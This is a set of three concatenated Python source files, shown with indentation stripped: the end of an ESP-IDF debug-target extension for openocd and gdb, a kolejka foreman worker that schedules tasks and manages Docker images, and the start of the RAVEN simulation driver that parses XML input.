# variable. The greenlet package cannot be downgraded for compatibility with other requirements (gdbgui,
# pygdbmi).
env['PURE_PYTHON'] = '1'
try:
process = subprocess.Popen(args, stdout=gdbgui_out, stderr=subprocess.STDOUT, bufsize=1, env=env)
except Exception as e:
print(e)
raise FatalError('Error starting gdbgui. Please make sure gdbgui can be started', ctx)
processes['gdbgui'] = process
processes['gdbgui_outfile'] = gdbgui_out
processes['gdbgui_outfile_name'] = gdbgui_out_name
print('gdbgui started as a background task {}'.format(process.pid))
_check_openocd_errors(fail_if_openocd_failed, action, ctx)
def global_callback(ctx, global_args, tasks):
def move_to_front(task_name):
for index, task in enumerate(tasks):
if task.name == task_name:
tasks.insert(0, tasks.pop(index))
break
debug_targets = any([task.name in ('openocd', 'gdbgui') for task in tasks])
if debug_targets:
# Register the meta cleanup callback -> called on FatalError
ctx.meta['cleanup'] = debug_cleanup
move_to_front('gdbgui') # possibly 2nd
move_to_front('openocd') # always 1st
# followed by "monitor", "gdb" or "gdbtui" in any order
post_action = ctx.invoke(ctx.command.get_command(ctx, 'post_debug'))
if any([task.name in ('monitor', 'gdb', 'gdbtui') for task in tasks]):
post_action.action_args['block'] = 0
else:
post_action.action_args['block'] = 1
tasks.append(post_action) # always last
if any([task.name == 'openocd' for task in tasks]):
for task in tasks:
if task.name in ('gdb', 'gdbgui', 'gdbtui'):
task.action_args['require_openocd'] = True
def run_gdb(gdb_args):
p = subprocess.Popen(gdb_args)
processes['gdb'] = p
return p.wait()
def gdbtui(action, ctx, args, gdbinit, require_openocd):
"""
Synchronous GDB target with text ui mode
"""
gdb(action, ctx, args, 1, gdbinit, require_openocd)
def gdb(action, ctx, args, gdb_tui, gdbinit, require_openocd):
"""
Synchronous GDB target
"""
watch_openocd = Thread(target=_check_openocd_errors, args=(fail_if_openocd_failed, action, ctx, ))
watch_openocd.start()
processes['threads_to_join'].append(watch_openocd)
desc_path = os.path.join(args.build_dir, 'project_description.json')
if not os.path.exists(desc_path):
ensure_build_directory(args, ctx.info_name)
with open(desc_path, 'r') as f:
project_desc = json.load(f)
elf_file = os.path.join(args.build_dir, project_desc['app_elf'])
if not os.path.exists(elf_file):
raise FatalError('ELF file not found. You need to build & flash the project before running debug targets', ctx)
gdb = project_desc['monitor_toolprefix'] + 'gdb'
local_dir = project_desc['build_dir']
if gdbinit is None:
gdbinit = os.path.join(local_dir, 'gdbinit')
create_local_gdbinit(gdbinit, elf_file)
args = [gdb, '-x={}'.format(gdbinit)]
if gdb_tui is not None:
args += ['-tui']
t = Thread(target=run_gdb, args=(args, ))
t.start()
while True:
try:
t.join()
break
except KeyboardInterrupt:
# Catching Keyboard interrupt, as this is used for breaking running program in gdb
continue
finally:
watch_openocd.join()
try:
processes['threads_to_join'].remove(watch_openocd)
except ValueError:
# Valid scenario: watch_openocd task won't be in the list if openocd not started from idf.py
pass
fail_if_openocd_failed = {
'names': ['--require-openocd', '--require_openocd'],
'help':
('Fail this target if openocd (this target\'s dependency) failed.\n'),
'is_flag': True,
'default': False,
}
gdbinit = {
'names': ['--gdbinit'],
'help': ('Specify the name of gdbinit file to use\n'),
'default': None,
}
debug_actions = {
'global_action_callbacks': [global_callback],
'actions': {
'openocd': {
'callback': openocd,
'help': 'Run openocd from current path',
'options': [
{
'names': ['--openocd-scripts', '--openocd_scripts'],
'help':
('Script directory for openocd cfg files.\n'),
'default':
None,
},
{
'names': ['--openocd-commands', '--openocd_commands'],
'help':
('Command line arguments for openocd.\n'),
'default': None,
}
],
'order_dependencies': ['all', 'flash'],
},
'gdb': {
'callback': gdb,
'help': 'Run the GDB.',
'options': [
{
'names': ['--gdb-tui', '--gdb_tui'],
'help':
('run gdb in TUI mode\n'),
'default':
None,
}, gdbinit, fail_if_openocd_failed
],
'order_dependencies': ['all', 'flash'],
},
'gdbgui': {
'callback': gdbui,
'help': 'GDB UI in default browser.',
'options': [
{
'names': ['--gdbgui-port', '--gdbgui_port'],
'help':
('The port on which gdbgui will be hosted. Default: 5000\n'),
'default':
None,
}, gdbinit, fail_if_openocd_failed
],
'order_dependencies': ['all', 'flash'],
},
'gdbtui': {
'callback': gdbtui,
'help': 'GDB TUI mode.',
'options': [gdbinit, fail_if_openocd_failed],
'order_dependencies': ['all', 'flash'],
},
'post_debug': {
'callback': post_debug,
'help': 'Utility target to read the output of async debug action and stop them.',
'options': [
{
'names': ['--block'],
'help':
('Set to 1 for blocking the console on the outputs of async debug actions\n'),
'default': 0,
},
],
'order_dependencies': [],
},
},
}
return debug_actions
|
foreman.py
|
# vim:ts=4:sts=4:sw=4:expandtab
import copy
import datetime
import dateutil.parser
import glob
import json
import logging
import math
from multiprocessing import Process
import os
import random
import shutil
import subprocess
import sys
import tempfile
import traceback
from threading import Thread
import time
import uuid
from kolejka.common import kolejka_config, foreman_config
from kolejka.common import KolejkaTask, KolejkaResult, KolejkaLimits
from kolejka.common import MemoryAction, TimeAction, parse_memory
from kolejka.client import KolejkaClient
from kolejka.worker.stage0 import stage0
from kolejka.worker.volume import check_python_volume
def manage_images(pull, size, necessary_images, priority_images):
necessary_size = sum(necessary_images.values(), 0)
free_size = size - necessary_size
assert free_size >= 0
docker_images = dict([(a.split()[0], parse_memory(a.split()[1])) for a in str(subprocess.run(['docker', 'image', 'ls', '--format', '{{.Repository}}:{{.Tag}} {{.Size}}'], stdout=subprocess.PIPE, check=True).stdout, 'utf-8').split('\n') if a])
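# each parsed line looks roughly like "ubuntu:20.04 72.8MB" (illustrative tag
# and size); parse_memory converts the human-readable size into bytes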
p_images = dict()
for image in priority_images:
if image in docker_images:
p_images[image] = docker_images[image]
priority_images = p_images
keep_images = set()
for image in necessary_images:
keep_images.add(image)
list_images = list(priority_images.items())
random.shuffle(list_images)
li = list(docker_images.items())
random.shuffle(li)
list_images += li
for image,size in list_images:
if image in keep_images:
continue
if size <= free_size:
free_size -= size
keep_images.add(image)
for image in docker_images:
if image not in keep_images:
subprocess.run(['docker', 'image', 'rm', image])
for image,size in necessary_images.items():
pull_image = pull
if not pull_image:
docker_inspect_run = subprocess.run(['docker', 'image', 'inspect', image], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
if docker_inspect_run.returncode != 0:
pull_image = True
if pull_image:
subprocess.run(['docker', 'pull', image], check=True)
docker_inspect_run = subprocess.run(['docker', 'image', 'inspect', '--format', '{{json .Size}}', image], stdout=subprocess.PIPE, check=True)
image_size = int(json.loads(str(docker_inspect_run.stdout, 'utf-8')))
assert image_size <= size
def foreman_single(temp_path, task):
config = foreman_config()
with tempfile.TemporaryDirectory(dir=temp_path) as jailed_path:
if task.limits.workspace is not None:
subprocess.run(['mount', '-t', 'tmpfs', '-o', 'size='+str(task.limits.workspace), 'none', jailed_path], check=True)
try:
task_path = os.path.join(jailed_path, 'task')
result_path = os.path.join(jailed_path, 'result')
temp_path = os.path.join(jailed_path, 'temp')
os.makedirs(task_path, exist_ok=True)
os.makedirs(result_path, exist_ok=True)
os.makedirs(temp_path, exist_ok=True)
task.path = task_path
client = KolejkaClient()
client.task_get(task.id, task_path)
for k,f in task.files.items():
f.path = k
task.commit()
stage0(task.path, result_path, temp_path=temp_path, consume_task_folder=True)
result = KolejkaResult(result_path)
result.tags = config.tags
client.result_put(result)
except:
traceback.print_exc()
finally:
if task.limits.workspace is not None:
subprocess.run(['umount', '-l', jailed_path])
def foreman():
config = foreman_config()
limits = KolejkaLimits()
limits.cpus = config.cpus
limits.memory = config.memory
limits.swap = config.swap
limits.pids = config.pids
limits.storage = config.storage
limits.image = config.image
limits.workspace = config.workspace
limits.time = config.time
limits.network = config.network
client = KolejkaClient()
while True:
try:
tasks = client.dequeue(config.concurency, limits, config.tags)
if len(tasks) == 0:
time.sleep(config.interval)
else:
check_python_volume()
while len(tasks) > 0:
resources = KolejkaLimits()
resources.update(limits)
image_usage = dict()
processes = list()
cpus_offset = 0
for task in tasks:
if len(processes) >= config.concurency:
break
if task.exclusive and len(processes) > 0:
break
task.limits.update(limits)
task.limits.cpus_offset = cpus_offset
ok = True
if resources.cpus is not None and task.limits.cpus > resources.cpus:
ok = False
if resources.memory is not None and task.limits.memory > resources.memory:
ok = False
if resources.swap is not None and task.limits.swap > resources.swap:
ok = False
if resources.pids is not None and task.limits.pids > resources.pids:
ok = False
if resources.storage is not None and task.limits.storage > resources.storage:
ok = False
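# Image size is accounted differently: several tasks may share the same image, so
# only the increase over the size already reserved for that image counts against
# the pool.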
if resources.image is not None:
image_usage_add = max(image_usage.get(task.image, 0), task.limits.image) - image_usage.get(task.image, 0)
if image_usage_add > resources.image:
ok = False
if resources.workspace is not None and task.limits.workspace > resources.workspace:
ok = False
if ok:
proc = Process(target=foreman_single, args=(config.temp_path, task))
processes.append(proc)
cpus_offset += task.limits.cpus
if resources.cpus is not None:
resources.cpus -= task.limits.cpus
if resources.memory is not None:
resources.memory -= task.limits.memory
if resources.swap is not None:
resources.swap -= task.limits.swap
if resources.pids is not None:
resources.pids -= task.limits.pids
if resources.storage is not None:
resources.storage -= task.limits.storage
if resources.image is not None:
resources.image -= image_usage_add
image_usage[task.image] = max(image_usage.get(task.image, 0), task.limits.image)
if resources.workspace is not None:
resources.workspace -= task.limits.workspace
tasks = tasks[1:]
if task.exclusive:
break
else:
break
if config.image is not None:
manage_images(config.pull, config.image, image_usage, [task.image for task in tasks])
for proc in processes:
proc.start()
for proc in processes:
proc.join()
except KeyboardInterrupt:
raise
except:
traceback.print_exc()
time.sleep(config.interval)
def config_parser(parser):
parser.add_argument('--auto-tags', type=bool, help='add automatically generated machine tags', default=True)
parser.add_argument('--pull', action='store_true', help='always pull images, even if local version is present', default=False)
parser.add_argument('--tags', type=str, help='comma separated list of machine tags')
parser.add_argument('--temp', type=str, help='temp folder')
parser.add_argument('--interval', type=float, help='dequeue interval (in seconds)')
parser.add_argument('--concurency', type=int, help='number of simultaneous tasks')
parser.add_argument('--cpus', type=int, help='cpus limit')
parser.add_argument('--memory', action=MemoryAction, help='memory limit')
parser.add_argument('--swap', action=MemoryAction, help='swap limit')
parser.add_argument('--pids', type=int, help='pids limit')
parser.add_argument('--storage', action=MemoryAction, help='storage limit')
parser.add_argument('--image', action=MemoryAction, help='image size limit')
parser.add_argument('--workspace', action=MemoryAction, help='workspace size limit')
parser.add_argument('--time', action=TimeAction, help='time limit')
parser.add_argument('--network', type=bool, help='allow networking')
def execute(args):
kolejka_config(args=args)
foreman()
parser.set_defaults(execute=execute)
|
Simulation.py
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module that contains the driver for the whole simulation flow (Simulation Class)
"""
import xml.etree.ElementTree as ET
import os,subprocess
import sys
import io
import string
import datetime
import numpy as np
import threading
import MessageHandler # this needs to happen early to instantiate message handler
from BaseClasses import MessageUser
import PluginFactory
import Steps
import DataObjects
import Files
import Samplers
import Optimizers
import Models
import Metrics
import Distributions
import Databases
import Functions
import OutStreams
from JobHandler import JobHandler
from utils import utils, TreeStructure, xmlUtils, mathUtils
import Decorators
from Application import __QtAvailable
from Interaction import Interaction
if __QtAvailable:
from Application import InteractiveApplication
# Load up plugins!
# -> only available on specially-marked base types
Models.Model.loadFromPlugins()
#----------------------------------------------------------------------------------------------------
class SimulationMode(MessageUser):
"""
SimulationMode allows changes to how the simulation runs are done.
modifyInfo lets the mode change runInfoDict and other parameters.
remoteRunCommand lets a command for running RAVEN remotely be specified.
"""
def __init__(self, *args):
"""
Constructor
@ In, args, list, unused positional arguments
@ Out, None
"""
super().__init__()
self.printTag = 'SIMULATION MODE'
def remoteRunCommand(self, runInfoDict):
"""
If this returns None, do nothing. If it returns a dictionary,
use the dictionary to run raven remotely.
@ In, runInfoDict, dict, the run info
@ Out, remoteRunCommand, dict, the information for the remote command.
The dictionary should have a "args" key that is used as a command to
a subprocess.call. It optionally can have a "cwd" for the current
working directory and a "env" for the environment to use for the command.
"""
return None
def modifyInfo(self, runInfoDict):
"""
modifyInfo is called after the runInfoDict has been set up.
This allows the mode to change any parameters that need changing.
This typically modifies the precommand and the postcommand that
are put in front of and after the command, respectively.
@ In, runInfoDict, dict, the run info
@ Out, dictionary to use for modifications. If empty, no changes
"""
import multiprocessing
try:
if multiprocessing.cpu_count() < runInfoDict['batchSize']:
self.raiseAWarning("cpu_count",multiprocessing.cpu_count(),"< batchSize",runInfoDict['batchSize'])
except NotImplementedError:
pass
return {}
def XMLread(self,xmlNode):
"""
XMLread is called with the mode node, and can be used to
get extra parameters needed for the simulation mode.
@ In, xmlNode, xml.etree.ElementTree.Element, the xml node that belongs to this class instance
@ Out, None
"""
pass
#Note that this has to be after SimulationMode is defined or the CustomModes
#don't see SimulationMode when they import Simulation
import CustomModes
def splitCommand(s):
"""
Splits the string s into a list that can be used for the command
So for example splitCommand("ab bc c 'el f' \"bar foo\" ") ->
['ab', 'bc', 'c', 'el f', 'bar foo']
Bugs: Does not handle quoted strings with different kinds of quotes
@ In, s, string, the command to split
@ Out, retList, list, the list of split command parts
"""
n = 0
retList = []
inQuote = False
buffer = ""
while n < len(s):
current = s[n]
if current in string.whitespace and not inQuote:
if len(buffer) > 0:
#found end of command
retList.append(buffer)
buffer = ""
elif current in "\"'":
if inQuote:
inQuote = False
else:
inQuote = True
else:
buffer = buffer + current
n += 1
if len(buffer) > 0:
retList.append(buffer)
return retList
#----------------------------------------------------------------------
#
#
#
#-----------------------------------------------------------------------------------------------------
class Simulation(MessageUser):
"""
This is a class that contains all the objects needed to run the simulation
Usage:
myInstance = Simulation() !Generate the instance
myInstance.XMLread(xml.etree.ElementTree.Element) !This method generate all the objects living in the simulation
myInstance.initialize() !This method takes care of setting up the directory/file environment with proper checks
myInstance.run() !This method run the simulation
Utility methods:
myInstance.printDicts !prints the dictionaries representing the whole simulation
myInstance.setInputFiles !re-associate the set of files owned by the simulation
myInstance.getDefaultInputFile !return the default name of the input file read by the simulation
Inherited from the BaseType class:
myInstance.whoAreYou() !inherited from BaseType class-
myInstance.myClassmyCurrentSetting() !see BaseType class-
--how to add a new entity <myClass> to the simulation--
Add an import for the module where it is defined. Convention is that the module is named with the plural
of the base class of the module: <MyModule>=<myClass>+'s'.
The base class of the module is by convention named as the new type of simulation component <myClass>.
The module should contain a set of classes named <myType> that are child of the base class <myClass>.
The module should possess a function <MyModule>.factory.returnInstance('<myType>') that returns a pointer to the class <myType>.
Add in Simulation.__init__ the following
self.<myClass>Dict = {}
self.entityModules['<myClass>'] = <MyModule>
self.entities['<myClass>' ] = self.<myClass>+'Dict'
The XML describing the new entity should be organized as it follows:
<MyModule (camelback with first letter capital)>
<MyType (camelback with first letter capital) name='here a user given name' subType='here additional specialization'>
<if needed more xml nodes>
</MyType>
</MyModule>
--Comments on the simulation environment--
every type of element living in the simulation should be uniquely identified by type and name not by sub-type
!!!!Wrong!!!!!!!!!!!!!!!!:
Class: distribution, type: normal, name: myDistribution
Class: distribution, type: triangular, name: myDistribution
Correct:
type: distribution, type: normal, name: myNormalDist
type: distribution, type: triangular, name: myTriDist
Using the 'type' attribute in the xml node <MyType> is discouraged to avoid confusion
"""
def __init__(self, frameworkDir, verbosity='all', interactive=Interaction.No):
"""
Constructor
@ In, frameworkDir, string, absolute path to framework directory
@ In, verbosity, string, optional, general verbosity level
@ In, interactive, Interaction, optional, toggles the ability to provide
an interactive UI or to run to completion without human interaction
@ Out, None
"""
super().__init__()
self.FIXME = False
#set the numpy print threshold to avoid ellipses in array truncation
np.set_printoptions(threshold=np.inf)
self.verbosity = verbosity
callerLength = 25
tagLength = 15
suppressErrs = False
self.messageHandler.initialize({'verbosity':self.verbosity,
'callerLength':callerLength,
'tagLength':tagLength,
'suppressErrs':suppressErrs})
readtime = datetime.datetime.fromtimestamp(self.messageHandler.starttime).strftime('%Y-%m-%d %H:%M:%S')
sys.path.append(os.getcwd())
#this dictionary contains the general info to run the simulation
self.runInfoDict = {}
self.runInfoDict['DefaultInputFile' ] = 'test.xml' #Default input file to use
self.runInfoDict['SimulationFiles' ] = [] #the xml input file
self.runInfoDict['ScriptDir' ] = os.path.join(os.path.dirname(frameworkDir),"scripts") # the location of the pbs script interfaces
self.runInfoDict['FrameworkDir' ] = frameworkDir # the directory where the framework is located
self.runInfoDict['RemoteRunCommand' ] = os.path.join(frameworkDir,'raven_qsub_command.sh')
self.runInfoDict['NodeParameter' ] = '-f' # the parameter used to specify the files where the nodes are listed
self.runInfoDict['MPIExec' ] = 'mpiexec' # the command used to run mpi commands
self.runInfoDict['WorkingDir' ] = '' # the directory where the framework should be running
self.runInfoDict['TempWorkingDir' ] = '' # the temporary directory where a simulation step is run
self.runInfoDict['NumMPI' ] = 1 # the number of mpi process by run
self.runInfoDict['NumThreads' ] = 1 # Number of Threads by run
self.runInfoDict['numProcByRun' ] = 1 # Total number of core used by one run (number of threads by number of mpi)
self.runInfoDict['batchSize' ] = 1 # number of contemporaneous runs
self.runInfoDict['internalParallel' ] = False # activate internal parallel (parallel python). If True parallel python is used, otherwise multi-threading is used
self.runInfoDict['ParallelCommand' ] = '' # the command that should be used to submit jobs in parallel (mpi)
self.runInfoDict['ThreadingCommand' ] = '' # the command should be used to submit multi-threaded
self.runInfoDict['totalNumCoresUsed' ] = 1 # total number of cores used by driver
self.runInfoDict['queueingSoftware' ] = '' # queueing software name
self.runInfoDict['stepName' ] = '' # the name of the step currently running
self.runInfoDict['precommand' ] = '' # Add to the front of the command that is run
self.runInfoDict['postcommand' ] = '' # Added after the command that is run.
self.runInfoDict['delSucLogFiles' ] = False # If a simulation (code run) has not failed, delete the relative log file (if True)
self.runInfoDict['deleteOutExtension'] = [] # If a simulation (code run) has not failed, delete the relative output files with the listed extension (comma separated list, for example: 'e,r,txt')
self.runInfoDict['mode' ] = '' # Running mode. Currently the only mode supported is mpi, but others can be added with custom modes.
self.runInfoDict['Nodes' ] = [] # List of node IDs. Filled only in case RAVEN is run in a DMP machine
self.runInfoDict['expectedTime' ] = '10:00:00' # How long the complete input is expected to run.
self.runInfoDict['logfileBuffer' ] = int(io.DEFAULT_BUFFER_SIZE)*50 # logfile buffer size in bytes
self.runInfoDict['clusterParameters' ] = [] # Extra parameters to use with the qsub command.
self.runInfoDict['maxQueueSize' ] = None
#Following is a set of dictionaries that, in a manner consistent with their names, collect the instances of all objects needed in the simulation
#Their keywords in the dictionaries are the user-given names of data, samplers, etc.
#The value corresponding to a keyword is the instance of the corresponding class
self.stepsDict = {}
self.dataDict = {}
self.samplersDict = {}
self.modelsDict = {}
self.distributionsDict = {}
self.dataBasesDict = {}
self.functionsDict = {}
self.filesDict = {} # for each file returns an instance of a Files class
self.metricsDict = {}
self.outStreamsDict = {}
self.stepSequenceList = [] #the list of step of the simulation
#list of supported queue-ing software:
self.knownQueueingSoftware = []
self.knownQueueingSoftware.append('None')
self.knownQueueingSoftware.append('PBS Professional')
#Dictionary of mode handlers for the available simulation modes
self.__modeHandlerDict = CustomModes.modeHandlers
#self.__modeHandlerDict['mpi'] = CustomModes.MPISimulationMode
#self.__modeHandlerDict['mpilegacy'] = CustomModes.MPILegacySimulationMode
#this dictionary contains the static factory that returns the instance of one of the allowed entities in the simulation
#the keywords are the name of the module that contains the specialization of that specific entity
self.entityModules = {}
self.entityModules['Steps' ] = Steps
self.entityModules['DataObjects' ] = DataObjects
self.entityModules['Samplers' ] = Samplers
self.entityModules['Optimizers' ] = Optimizers
self.entityModules['Models' ] = Models
self.entityModules['Distributions' ] = Distributions
self.entityModules['Databases' ] = Databases
self.entityModules['Functions' ] = Functions
self.entityModules['Files' ] = Files
self.entityModules['Metrics' ] = Metrics
self.entityModules['OutStreams' ] = OutStreams
# register plugins
# -> don't actually load them, because we want to lazy load if at all possible
# -> instead, we just provide the pointer to the plugins dicts
for name, module in self.entityModules.items():
if hasattr(module, 'setPluginFactory'):
module.setPluginFactory(PluginFactory)
#Mapping between an entity type and the dictionary containing the instances for the simulation
self.entities = {}
self.entities['Steps' ] = self.stepsDict
self.entities['DataObjects' ] = self.dataDict
self.entities['Samplers' ] = self.samplersDict
self.entities['Optimizers' ] = self.samplersDict
self.entities['Models' ] = self.modelsDict
self.entities['RunInfo' ] = self.runInfoDict
self.entities['Files' ] = self.filesDict
self.entities['Distributions' ] = self.distributionsDict
self.entities['Databases' ] = self.dataBasesDict
self.entities['Functions' ] = self.functionsDict
self.entities['Metrics' ] = self.metricsDict
self.entities['OutStreams' ] = self.outStreamsDict
# The QApplication
## The benefit of this enumerated type is that anything other than
## Interaction.No will evaluate to true here and correctly make the
## interactive app.
if interactive:
self.app = InteractiveApplication([], interactive)
else:
self.app = None
#the handler of the runs within each step
self.jobHandler = JobHandler()
#handle the setting of how the jobHandler acts
self.__modeHandler = SimulationMode(self)
self.printTag = 'SIMULATION'
self.raiseAMessage('Simulation started at',readtime,verbosity='silent')
self.pollingThread = threading.Thread(target=self.jobHandler.startLoop)
## This allows RAVEN to exit when the only thing left is the JobHandler
## This should no longer be necessary since the jobHandler now has an off
## switch that this object can flip when it is complete, however, if
## simulation fails before it is finished, we should probably still ensure
## that this thread is killed as well, so maybe it is best to keep it for
## now.
self.pollingThread.daemon = True
self.pollingThread.start()
@Decorators.timingProfile
def setInputFiles(self,inputFiles):
"""
Method that can be used to set the input files that the program received.
These are currently used for cluster running where the program
needs to be restarted on a different node.
@ In, inputFiles, list, input files list
@ Out, None
"""
self.runInfoDict['SimulationFiles' ] = inputFiles
def getDefaultInputFile(self):
"""
Returns the default input file to read
@ In, None
@ Out, defaultInputFile, string, default input file
"""
defaultInputFile = self.runInfoDict['DefaultInputFile']
return defaultInputFile
def __createAbsPath(self,fileIn):
"""
Assuming that the file is already in self.filesDict, this places the absolute path as its value
@ In, fileIn, string, the file name that needs to be made "absolute"
@ Out, None
"""
curfile = self.filesDict[fileIn]
path = os.path.normpath(self.runInfoDict['WorkingDir'])
curfile.prependPath(path) #this respects existing path from the user input, if any
def XMLpreprocess(self,node,cwd):
"""
Preprocess the input file, load external xml files into the main ET
@ In, node, TreeStructure.InputNode, element of RAVEN input file
@ In, cwd, string, current working directory (for relative path searches)
@ Out, None
"""
xmlUtils.expandExternalXML(node,cwd)
def XMLread(self,xmlNode,runInfoSkip = set(),xmlFilename=None):
"""
parses the xml input file and instantiates the classes needed to represent all objects in the simulation
@ In, xmlNode, ElementTree.Element, xml node to read in
@ In, runInfoSkip, set, optional, nodes to skip
@ In, xmlFilename, string, optional, xml filename for relative directory
@ Out, None
"""
#TODO update syntax to note that we read InputTrees not XmlTrees
unknownAttribs = utils.checkIfUnknowElementsinList(['printTimeStamps','verbosity','color','profile'],list(xmlNode.attrib.keys()))
if len(unknownAttribs) > 0:
errorMsg = 'The following attributes are unknown:'
for element in unknownAttribs:
errorMsg += ' ' + element
self.raiseAnError(IOError,errorMsg)
self.verbosity = xmlNode.attrib.get('verbosity','all').lower()
if 'printTimeStamps' in xmlNode.attrib.keys():
self.raiseADebug('Setting "printTimeStamps" to',xmlNode.attrib['printTimeStamps'])
self.messageHandler.setTimePrint(xmlNode.attrib['printTimeStamps'])
if 'color' in xmlNode.attrib.keys():
self.raiseADebug('Setting color output mode to',xmlNode.attrib['color'])
self.messageHandler.setColor(xmlNode.attrib['color'])
if 'profile' in xmlNode.attrib.keys():
thingsToProfile = list(p.strip().lower() for p in xmlNode.attrib['profile'].split(','))
if 'jobs' in thingsToProfile:
self.jobHandler.setProfileJobs(True)
self.messageHandler.verbosity = self.verbosity
runInfoNode = xmlNode.find('RunInfo')
if runInfoNode is None:
self.raiseAnError(IOError,'The RunInfo node is missing!')
self.__readRunInfo(runInfoNode,runInfoSkip,xmlFilename)
### expand variable groups before continuing ###
## build variable groups ##
varGroupNode = xmlNode.find('VariableGroups')
# init, read XML for variable groups
if varGroupNode is not None:
varGroups = mathUtils.readVariableGroups(varGroupNode)
else:
varGroups={}
# read other nodes
for child in xmlNode:
if child.tag == 'VariableGroups':
continue #we did these before the for loop
xmlUtils.replaceVariableGroups(child, varGroups)
if child.tag in self.entities:
className = child.tag
# we already took care of RunInfo block
if className in ['RunInfo']:
continue
self.raiseADebug('-'*2+' Reading the block: {0:15}'.format(str(child.tag))+2*'-')
if len(child.attrib) == 0:
globalAttributes = {}
else:
globalAttributes = child.attrib
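# Two parsing paths: entities whose factory exposes returnInputParameter are read through
# the structured input-parameter specification, all the others fall back to the legacy
# readXML path below.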
if self.entityModules[className].factory.returnInputParameter:
paramInput = self.entityModules[className].returnInputParameter()
paramInput.parseNode(child)
for childChild in paramInput.subparts:
childName = childChild.getName()
entity = self.entityModules[className].factory.returnInstance(childName)
entity.applyRunInfo(self.runInfoDict)
entity.handleInput(childChild, globalAttributes=globalAttributes)
name = entity.name
self.entities[className][name] = entity
else:
for childChild in child:
subType = childChild.tag
if 'name' in childChild.attrib.keys():
name = childChild.attrib['name']
self.raiseADebug('Reading type '+str(childChild.tag)+' with name '+name)
#place the instance in the proper dictionary (self.entities[Type]) under its name as key,
#the type is the general class (sampler, data, etc) while childChild.tag is the sub type
if name not in self.entities[className]:
entity = self.entityModules[className].factory.returnInstance(childChild.tag)
else:
self.raiseAnError(IOError,'Redundant naming in the input for class '+className+' and name '+name)
entity.applyRunInfo(self.runInfoDict)
entity.readXML(childChild, varGroups, globalAttributes=globalAttributes)
self.entities[className][name] = entity
else:
self.raiseAnError(IOError,'name attribute not found for one "{}": {}'.format(className,subType))
else:
#tag not in entities, check if it's a documentation tag
if child.tag not in ['TestInfo']:
self.raiseAnError(IOError,'<'+child.tag+'> is not among the known simulation components '+repr(child))
# If requested, duplicate input
# ###NOTE: All substitutions to the XML input tree should be done BEFORE this point!!
if self.runInfoDict.get('printInput',False):
fileName = os.path.join(self.runInfoDict['WorkingDir'],self.runInfoDict['printInput'])
self.raiseAMessage('Writing duplicate input file:',fileName)
outFile = open(fileName,'w')
outFile.writelines(utils.toString(TreeStructure.tostring(xmlNode))+'\n') #\n for no-end-of-line issue
outFile.close()
if not set(self.stepSequenceList).issubset(set(self.stepsDict.keys())):
self.raiseAnError(IOError,'The step list: '+str(self.stepSequenceList)+' contains steps that have not been declared: '+str(list(self.stepsDict.keys())))
def initialize(self):
"""
Method to initialize the simulation.
Check/create the working directory, check/set up the parallel environment, call the step consistency checker
@ In, None
@ Out, None
"""
#move the full simulation environment in the working directory
self.raiseADebug('Moving to working directory:',self.runInfoDict['WorkingDir'])
os.chdir(self.runInfoDict['WorkingDir'])
#add also the new working dir to the path
sys.path.append(os.getcwd())
# clear the raven status file, if any
self.clearStatusFile()
#check consistency and fill the missing info for the // runs (threading, mpi, batches)
self.runInfoDict['numProcByRun'] = self.runInfoDict['NumMPI']*self.runInfoDict['NumThreads']
oldTotalNumCoresUsed = self.runInfoDict['totalNumCoresUsed']
self.runInfoDict['totalNumCoresUsed'] = self.runInfoDict['numProcByRun']*self.runInfoDict['batchSize']
if self.runInfoDict['totalNumCoresUsed'] < oldTotalNumCoresUsed:
#This is used to reserve some cores
self.runInfoDict['totalNumCoresUsed'] = oldTotalNumCoresUsed
elif oldTotalNumCoresUsed > 1:
#If 1, probably just default
self.raiseAWarning("overriding totalNumCoresUsed",oldTotalNumCoresUsed,"to", self.runInfoDict['totalNumCoresUsed'])
#transform all files in absolute path
for key in self.filesDict.keys():
self.__createAbsPath(key)
#Let the mode handler do any modification here
newRunInfo = self.__modeHandler.modifyInfo(dict(self.runInfoDict))
for key in newRunInfo:
#Copy in all the new keys
self.runInfoDict[key] = newRunInfo[key]
self.jobHandler.applyRunInfo(self.runInfoDict)
self.jobHandler.initialize()
# only print the dictionaries when the verbosity is set to debug
#if self.verbosity == 'debug': self.printDicts()
for stepName, stepInstance in self.stepsDict.items():
self.checkStep(stepInstance,stepName)
def checkStep(self,stepInstance,stepName):
"""
This method checks the coherence of the simulation step by step
@ In, stepInstance, instance, instance of the step
@ In, stepName, string, the name of the step to check
@ Out, None
"""
for [role, myClass, objectType, name] in stepInstance.parList:
if myClass != 'Step' and myClass not in list(self.entities.keys()):
self.raiseAnError(IOError, f'For step named "{stepName}" the role "{role}" has been ' +
f'assigned to an unknown class type "{myClass}"!')
if name not in self.entities[myClass]:
self.raiseADebug('name:',name)
self.raiseADebug('myClass:',myClass)
self.raiseADebug('list:',list(self.entities[myClass].keys()))
self.raiseADebug('entities[myClass]',self.entities[myClass])
self.raiseAnError(IOError, f'In step "{stepName}" the class "{myClass}" named "{name}" ' +
f'supposed to be used for the role "{role}" has not been found!')
if myClass != 'Files':
# check if object type is consistent
objtype = self.entities[myClass][name].type
def __readRunInfo(self,xmlNode,runInfoSkip,xmlFilename):
"""
Method that reads the xml input file for the RunInfo block
@ In, xmlNode, xml.etree.Element, the xml node that belongs to Simulation
@ In, runInfoSkip, string, the runInfo step to skip
@ In, xmlFilename, string, xml input file name
@ Out, None
"""
if 'verbosity' in xmlNode.attrib.keys():
self.verbosity = xmlNode.attrib['verbosity']
self.raiseAMessage('Global verbosity level is "',self.verbosity,'"',verbosity='quiet')
for element in xmlNode:
if element.tag in runInfoSkip:
self.raiseAWarning("Skipped element ",element.tag)
elif element.tag == 'printInput':
text = element.text.strip() if element.text is not None else ''
#extension fixing
if len(text) >= 4 and text[-4:].lower() == '.xml':
text = text[:-4]
# if the user asked to not print input instead of leaving off tag, respect it
if utils.stringIsFalse(text):
self.runInfoDict['printInput'] = False
# if the user didn't provide a name, provide a default
elif len(text)<1:
self.runInfoDict['printInput'] = 'duplicated_input.xml'
# otherwise, use the user-provided name
else:
